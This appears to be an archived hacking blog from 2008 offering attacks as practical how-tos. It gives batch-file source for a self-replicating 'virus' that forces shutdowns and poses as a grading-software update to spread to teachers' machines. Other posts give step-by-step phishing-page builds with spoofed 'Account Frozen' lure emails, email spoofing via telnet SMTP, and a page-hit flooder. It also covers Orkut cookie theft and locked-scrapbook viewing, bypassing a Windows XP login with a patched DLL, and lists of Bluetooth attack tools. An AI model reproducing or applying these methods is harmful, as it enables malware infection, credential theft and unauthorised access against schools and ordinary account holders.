Received: from [] by web4587.mail.*** 6. If you find more than one Received: from patterns, select the last one. 7. Track the IP address of the sender

Finding IP address in Yahoo! Mail
1. Log into your Yahoo! mail with your username and password. 2. Click on Inbox or whichever folder you have stored your mail. 3. Open the mail. 4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
• • • • • •

Click on Options on the top-right corner In the Mail Options page, click on General Preferences Scroll down to Messages where you have the Headers option Make sure that Show all headers on incoming messages is selected Click on the Save button Go back to the mails and open that mail

5. You should see similar headers like above Or if you want to manually find the IP address, proceed to 6. 6. Look for Received: from followed by the IP address between square brackets [ ]. Here, it is That is be the IP address of the sender. If there are many instances of Received: from with the IP address, select the IP address in the last pattern. If there are no instances of Received: from with the IP address, select the first IP address in X-Originating-IP. 7. Track the IP address of the sender

Finding IP address in Hotmail
1. Log into your Hotmail account with your username and password.

2. Click on the Mail tab on the top. 3. Open the mail. 4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
• • • • •

Click on Options on the top-right corner In the Mail Options page, click on Mail Display Settings In Message Headers, make sure Advanced option is checked Click on Ok button Go back to the mails and open that mail

5. You should see the email headers now. 6. manually find the IP address, proceed to 7. 7. If you find a header with X-Originating-IP: followed by an IP address, that is the sender’s IP address Hotmail headers In this case the IP address of the sender is []. 8. If you find a header with Received: from followed by a Gmail proxy like this

Hotmail headers
Look for Received: from followed by IP address within square brackets[ In this case, the IP address of the sender is []. 9. Or else if you have headers like this Hotmail headers Look for Received: from followed by IP address within square brackets[]. In this case, the IP address of the sender is [] (Spam mail). 10. If you have multiple Received: from headers, eliminate the ones that have 11. Track the IP address of the sender


Shut Down Your School!
Posted in XP Hacking, hacking with tags hack into school computers, hacking computers, hacking in school, how to shut down your school, shut down your school! on April 4, 2008 by hacktocrack

By using the following command you can shutdown your school or college by using only Note pad. This is the main command that will be launched upon startup. Type this in Notepad. @echo off shutdown.exe -s -t 10 -c “You have been hacked!” Save this as shutdown.bat, making sure you choose all files as the filetype. Step 2 Make it run on Startup The file you need can be downloaded here: This is just a simple registry file that anyone can create, but I don’t feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI. Step 3 Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe. Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti Here is the code: @echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit Save this as global.bat Step 4 They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there. @echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:

\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?: \$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?: \$start real.exeexit Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one. Step 5 The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it. @echo off shutdown -acd C:\WINDOWSdel shutdown.bat Save as cure.bat @echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS Now download this file: Step 6 The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.) 3 Comments »

Hide Your Files In a JPEG
Posted in Easy Hacking, hacking, offline hacking with tags free tips, hacking, hacking tips, hacking tricks, hide files, hide files in jpeg, hide folders, hide your files in a jpeg, how to hide files, how to hide folders on April 3, 2008 by hacktocrack

Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed. Ok, lets begin…

1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED). 2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden). 3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden. 4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden. 5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both. 6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive . 3 Comments »

Website Hacking
Posted in Hardcore Hacking, Internet Explorer, Javascript/html Hacking, Mozilla Firefox, Password Hacking, Website hacks, cmd, hack websites, hacking websites with tags hack a website, hack google, hack website, hacking, hacking tips, hacking tricks, how to hack a website on April 1, 2008 by hacktocrack

Note: This is for Average Hackerz, Not Newbies This article was taken from we are explaining the website attack known as Cross-Site Scripting (XSS). Cross-Site Scripting is a type of security vulnerability that affects web applications that do not sanitize user input properly. This kind of vulnerability allows an “attacker” to inject HTML or client side script like JavaScript into the website. Cross-Site Scripting is most commonly used to steal cookies. Cookies are used for authenticating, tracking, and maintaining specific information about users; therefore, by stealing a user’s cookies an attacker could bypass the website’s access control. There are three types of XSS attacks: Persistent, Non-Persistent, and DOM-Based. In this episode we will cover Persistent and Non-Persistent Cross-Site Scripting attacks.Live Stream Here Download Here Download Cookie Catcher Here Get a md5 password hasher, to decrypt the hash 7 Comments »

Page hits flooder
Posted in hack websites with tags flood page hits, hack page hits, page hits flooder on March 27, 2008 by hacktocrack

This small program can flood ur page hits. but you have to dedicate one browser for it.. like internet explorer method: make a batch file with these lines @echo off :1 start C:\Progra~1\Intern~1\iexplore.exe ““ ping -n 10 >nul taskkill.exe /im iexplore.exe goto 1 depending upon your net speed u may increase the 10 secs time wait with 10 sec time u may have 360 hits in an hour with 5 sec time u may have 720 hits in an hour 6 Comments »

Hack - View Locked Scrapbooks
Posted in Easy Hacking, Orkut, Website hacks, hacking with tags free hacking tips, hack locked scrapbooks, hacking, hacking tips, View Locked Scrapbooks on March 27, 2008 by hacktocrack

How To Use this Hack? There are three ways to use this hack.You can choose the one that best suits you. a> Login To Your Sandbox Profile and Directly View The Locked Scrapbook or b> Using this Javascript : * Navigate to the profile which has disallowed non-friends to view his/her scrapbook * Run this script in the address bar * javascript:document.location=’’+en codeURIComponent(location.href);void(0)

* Wait for 4-5 seconds and you will get to see the scraps. or c> Userscript (Credits - D3 ) - The Recommended Method because you need not run any script again and again. Kindly follow the instructions stated below: * Install Grease Monkey in case you don’t have it - Search for it on google (another way to resort to Firefox) * Install View Locked Scrapbook Script * In case you have any problems downloading or operating these scripts, you must read this tutorial. Leave A Comment »

Create your own f@ke login page!!!
Posted in Easy Hacking, Hotmail, Password Hacking, Website hacks, Yahoo, hacking with tags create yahoo fake login page, create your own fake login page, fake login, fake login page, hack hotmail, hack yahoo login page, phisher login on March 27, 2008 by hacktocrack

This is an easier version from the “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other” This goes into more detail on how to create a fake page to login, and get redirected while it is sending a email of the password and username to your inbox. If you found this easy, then try out the post, “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other” Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to you The process of Hacking anyone’s id using fake login pages is known as Phishing Now let’s learn how to create your very own fake login page. {1} Open and Sign Up. {2} then Login there with your newly registered account. {3} now click on ‘ Create your first form’. {4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.) {5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo) {6} Now Click on ‘Power Tool’ Option (In right hand side…) {7} Double click on ‘Password Box’. Now Click the newly form password entry to edit

it. Rename it as ‘Password:’ {8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties. {9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim. {10} Now in Thank You URL you must put some link, like or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…) {11} Now Click on ‘Save’. After saving, click on ‘Source’ Option. {12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′. {13} Now open Notepad text editor and write the following code their. Paste the Option2 code here {14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it. Now you can view it by typing the url in the address bar. NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on and there are many other sites which you can find on the internet very easily. I suppose that you created your account at now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done. Now you can access you file on the net by just typing the url ofthe file. And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form. see my fake login page 59 Comments »

Essential Bluetooth hacking tools
Posted in Uncategorized with tags bluesnarf, bluetooth hack, bluetooth sniffer, download bloover, download bluebugger, download bluediving, download bluescan, download bluesnarfer, download bluesniff, download bluetest, download btauding, download btbrowser, download btcrack, download cihwb, download t-bear, hack, hack bluetooth, hacking, how to bluesnarf on March 26, 2008 by hacktocrack

Bluetooth technology is great. No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users (remember Paris Hilton?).If you want the best Bluetooth hacker java app, then refer to the “Super Bluetooth Hack” post

If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them. This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices. Discovering Bluetooth Devices BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. Download BlueScan. BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. Download BlueSniff. BTBrowser - Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 - the Java Bluetooth specification. Download BTBrowser. BTCrawler -BTCrawler is a scanner for Windows Mobile based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Download BTCrawler. Hacking Bluetooth Devices BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. Download BlueBugger. CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Download CIHWB. Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode. Download Bluediving.

Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Download T-BEAR. Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetoothenabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. Download Bluesnarfer. BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Download BTcrack. Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. Download Blooover II. BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. Download BlueTest. BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. Download BTAuding. What’s next? Let everyone know to disable Bluetooth until they really need it. Additionally, make sure to update your phone software on a regular basis. 6 Comments »

Small Hack For Orkut
Posted in Mozilla Firefox, Orkut with tags hack orkut, orkut hacks on March 26, 2008 by hacktocrack

Taken From Orkut a very famous social networking site has an option called scrapbook. Now for those people who scrap many times a minute, here is a hack: If you are using firefox, Install this script (addon) and it will allow you to scrap back just in one click rather than the traditional 2 step + 1 click scrapping. This not only saves time, but also helps you keep things contextual.

Screenshot (click to enlarge):

Another reason to shift to firefox 9 Comments »

works with all versions of firefox.

Top 15 Hacking Software
Posted in Download, Easy Hacking, Hardcore Hacking, IP tools, Javascript/html Hacking, hacking, offline hacking with tags best hacking software, Easy Hacking, hacking software on March 18, 2008 by hacktocrack

1. Nmap I think everyone has heard of this one, recently evolved into the 4.x series. Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source. Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results. Get Nmap Here 2. Nessus Remote Security Scanner Recently went closed source, but is still essentially free. Works with a client-server framework. Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing

significant cost savings by using Nessus to audit business-critical enterprise devices and applications. Get Nessus Here 3. John the Ripper Yes, JTR 1.7 was recently released! John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches. You can get JTR Here 4. Nikto Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those). Get Nikto Here 5. SuperScan Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan. If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice. Get SuperScan Here 6. p0f P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

- machines that connect to your box (SYN mode), - machines you connect to (SYN+ACK mode), - machine you cannot connect to (RST+ mode), - machines whose communications you can observe. Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine. Get p0f Here 7. Wireshark (Formely Ethereal) Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers. Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later. Get Wireshark Here 8. Yersinia Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP). The best Layer 2 kit there is. Get Yersinia Here 9. Eraser Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License. An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here. 10. PuTTY PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients. Get PuTTY Here. 11. LCP Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing. A good free alternative to L0phtcrack. LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article. Get LCP Here 12. Cain and Abel My personal favourite for password cracking of any kind. Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. Get Cain and Abel Here 13. Kismet Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic. A good wireless tool as long as your card supports rfmon (look for an orinocco gold). Get Kismet Here 14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving. NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
• • • • • •

Verify that your network is set up the way you intended. Find locations with poor coverage in your WLAN. Detect other networks that may be causing interference on your network. Detect unauthorized “rogue” access points in your workplace. Help aim directional antennas for long-haul WLAN links. Use it recreationally for WarDriving.

Get NetStumbler Here 15. hping To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills. hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features. Get hping Here Source: 7 Comments »

Spoofing Via Telnet
Posted in Email, Telnet, cmd with tags fake email send, fake smtp, send fake email, spoofing telnet on March 18, 2008 by hacktocrack

Get a smtp server ( i use they’re normally likemx1,mx2 Now, go to Start>Run>cmd then in the cmd window, Type telnet 25 then HELO then MAIL FROM : (fake email here)

then RCPT TO: (person)then DATA then type your message, you can press enter for a new line, finish the message by a full stop (.) on a new line, press enter! spoofed. For Educational purpose only Didn’t it work? Go 1 Comment »

Auto Ph$her / Fake Web Login Creator
Posted in Uncategorized on March 13, 2008 by hacktocrack

Auto Ph!$her / fake Web Login Creator — By DaveDaDon All u need to do is write in the source of the page u wanna ph!$h and it will make the phisher for u automatically, and it even saves it as well. Download Password: PremSoni 5 Comments »

Get IP address anonymity everytime
Posted in IP tools, Other with tags hide proxy, hide your ip, ip hider, proxy hider on March 13, 2008 by hacktocrack

i have found one software which hide your IP address every time and give you a new IP address by creating a Tor Network……. If u have Mozilla then it works very fine First Download Vidalia Bundle from here Here is link for Windows and MAC OS ……….So download it according to your requirement .

After that to easily turn on and turn off “TOR” .. You can install Firefox add on from here : then restart firefox….After that you will see at right bottom corner that your tor addon for mozilla is installed…now when u want to hide your IP or want to surfing anonymously Turn on or turn off by clicking on this. You can check your ip address here 3 Comments »

A Cool Forum To Join
Posted in Uncategorized with tags cool forum, free movies, full games, full music albums on March 11, 2008 by hacktocrack

Join To get the latest Downloads Of Full Movies, Games, Music, Etc Check it out Leave A Comment »

Fastest Way To Hack into Someones System
Posted in Download, Easy Hacking, Hardcore Hacking with tags hack, fastest hack, easiest hack, free portscanner on March 4, 2008 by hacktocrack

Well as I already mentioned you can hack any system as it is conected to what we call “INTERNET”. To connect internet a system allocates a port for communication and Data Transfer. So we got to do is to get into that port that is to be hacked. Steps: 1. Software PORT SCANNER from google. 2. The IP address of the victim whose port is open. 3. NETLAB which gives u all information includes victim IP address,Area from where he is accessing internet…. 4. The IP of victim u found initially into NETLAB . 5. Thats it now you can access his system.

Note : This is really Hardcore Hacking and you should be very much careful while doing all this and you do all this on your own responsibility. This site is never responsible for anything you after reading any article from this site and there are almost 50-50 chances that you may get caught so don’t try this unless you are aware of everthing. Yes you can freak some of your friends by telling them that you can hack their systems very easily. 8 Comments »

A Cool Game To Play
Posted in Other with tags game, maze on March 2, 2008 by hacktocrack

Here’s A Cool Game To play If You Are Bored, Beat Me I Reached Level 5. Turn Up The volume Very High, It’s Soft

1 Comment »

Hack This Website Test
Posted in hack websites with tags hack, hack test, hack this website on March 2, 2008 by hacktocrack

If you really think you are a hacker, then Go to Reply with what level you are on


Download Jumper (2008)
Posted in Cracks/Wares, Download, Movies, Other with tags download full movie, download jumper movie, free jumper movie on February 29, 2008 by hacktocrack Jumper.TS.XViD-PreVail Title: Theater Date: Release Date: CD/INFO: Framerate: Audio: Type: IMDB Rating: URL: Genre: Jumper.2008 February.17.2008 February.14.2008 Cd1-50 x 15mbs 25fps PAL Direct Line XVID 6.4/10 (1,541 votes) Adventure / Drama / Sci-Fi / Thriller

In These Troubled Times, We shall PreVail!!! Tagline: Anywhere is possible. Plot Outline: A genetic anomaly allows a young man to teleport himself anywhere. He discovers this gift has existed for centuries and finds himself in has been raging for thousands of years between

Hack Windows XP Password
Posted in Hardcore Hacking, Password Hacking, XP Hacking, offline hacking with tags DreamPackPL, hack passwords, hack xp password, hacking, how to hack on February 29, 2008 by hacktocrack

Hi, Here’s Another Alternate to The Other Post - “Hack Windows XP Password” Another method to login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords. There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.

Steps to Hack into a Windows XP Computer without changing password: 1. Get physical access to the machine. Remember that it must have a CD or DVD drive. 2. Download DreamPackPL HERE. 3. Unzip the downloaded and you’ll get dpl.ISO. 4. Use any burning program that can burn ISO images. 5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files. 6. Press “R” to install DreamPackPL. 7. Press “C” to install DreamPackPL by using the recovery console. 8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed) 9. Backup your original sfcfiles.dll by typing: “ren C:WindowsSystem32sfcfiles.dll sfcfiles.lld” (without quotes) 10. Copy the hacked file from CD to system32 folder. Type: “copy D:i386pinball.ex_ C:WindowsSystem32sfcfiles.dll” (without quotes and assuming your CD drive is D 11. Type “exit”, take out disk and reboot. 12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear. 13. Click the top graphic on the DreamPack menu and you will get a menu popup.

14. Go to commands and enable the options and enable the god command.

15. Type “god” in the password field to get in Windows.You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password. Note: I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive. 6 Comments »

FAKE - Hack Password for Yahoo, Google, Gmail, AOL and MSN
Posted in Email, Gmail with tags hacking, hack hotmail, msn freezer, hack msn hotmail, hack msn, how to hack websites, hacking websites, hack website on February 29, 2008 by hacktocrack

DON’T TRY THIS, THIS IS AN EXAMPLE OF WHAT NOT TO DO Go to the “How to hack Hotmail, Gmail, Yahoo, Orkut Or Any Other Post” Instead *********************************************************************

If you are going to execute this, you are fooled. The above steps are false infos. They do not provide you the password. Instead they will actually hack your password: Never be fooled. Never send your password decrypted to any emails. 18 Comments »

Hack Password for Yahoo, Google, Gmail, AOL and MSN
Posted in Uncategorized on February 29, 2008 by hacktocrack

AN EXAMPLE OF WHAT NOT TO DO……………………….. STEP 1- Log in to your own yahoo account. Note: Your account must be at least 30 days old for this to work. STEP 2- Once you have logged into your own account, compose/write an e-mail to: This is a mailing address to the Retrivepassword. The automated server will send you the password that you have ‘forgotten’, after receiving the information you send them. STEP 3- In the subject line type exactly: ” PASSWORD RECOVERY “ STEP 4- On the first line of your mail write the email address of the person you are hacking. STEP 5- On the second line type in the e-mail address you are using. STEP 6- On the third line type in the password to YOUR email address (your OWN password). The computer needs your password so it can send a JavaScript from your account in the Yahoo Server to extract the

other email addresses password. In other word the system automatically checks your password to confirm the integrity of your status. The process will be done automatically by the user administration server. STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly: cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa script< ip:// v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#> {simply copy and paste above.} so for example if your yahoo id is : and your password is: David and the email address you want to hack is: then compose the mail as below: To: bcc: cc: (Don’t write anything in cc,bcc field) Subject: ” PASSWORD RECOVERY “ David cgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsa script< ip:// v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#> {simply copy and paste above.} The password will be sent to your inbox in a mail called “System Reg Message” from “System. For Gmail: To: Sub: Password Request : Rest as in yahoo AOL and MSN will be alive soon: If you are going to execute this, you are fooled. The above steps are false infos. They do not provide you the password. Instead they will actually hack your password: Never be fooled. Never send your password decrypted to any emails. 7 Comments »

How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other
Posted in Email, Gmail, Hotmail, Password Hacking, Website hacks, Yahoo, hacking with tags hack, hack gmail, hack hotmail, hack msn, hack msn hotmail, hack yahoo, msn freezer on February 28, 2008 by hacktocrack

In the previous version of “how to hack gmail or yahoo or hotmail or any other” One problem faced was that whenever the victim clicks on login a message would come saying “This page will send your information through email” which could sometime fail your hack.But in this new version this problem is eliminated and this is has become more fullproof than the previous version. First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be and for google it is After registering you will get an email from the web form designer with your form id.Now follow the following steps : 1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto 2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text. 3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML 4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with <form method=“post” action=“” autocomplete=“off” name=“login_form”> ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”)) 5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”) put the following code after placing your form id: <form name=“New_Form” action=“ Form ID Here” method=“post” enctype=“application/x-www-formurlencoded” onsubmit=“return New_Form_CF();”> Now Save the yahoofake.html. To hack the victim’s password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.

First of all upload your page using some free webhosting services. Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site”. Now select your site name as You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link. Now send a fake mail from to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen. After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked. If you have your own ideas plz write it as comment to this post. Your participation is always appreciated. Good Luck ! 93 Comments »

Fake Voice Changer
Posted in Download, Other with tags fake voice changer, free voice changer, full fake voice changer, morph voice on February 27, 2008 by hacktocrack

Fake Voice is a voice changer software which changes your voice to male, female, old, young, hard, shrill, or some one new. If you are female and want to sound like male or if you are male and want to sound like male, this is your tool. You can apply robotic effect

to sound like alien or echo effect to sound like you speaking from a well or tunnel. Whether you like you have fun with your friends or you want to improve your voice quality for audio recording, this tool give you full control over your voice. Download: 4.35 MB Mirror1: Mirror2: Mirror3: Pass: 2 Comments »

Hack Orkut Accounts
Posted in Hardcore Hacking, Mozilla Firefox, Orkut, Website hacks, hacking with tags cookie snarf, hack orkut, hack orkut accounts, hacking, orkut accounts on February 27, 2008 by hacktocrack

If This Doesn’t Work, Please Refer To The “Hot To Hack Gmail, Yahoo, Hotmail, Orkut, or any other” Post - It Has Been Tested, And It Works First get firefox and the cookie editor plugin for it…u will need them… Then make two fake accounts…u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised…the choice is yours though..

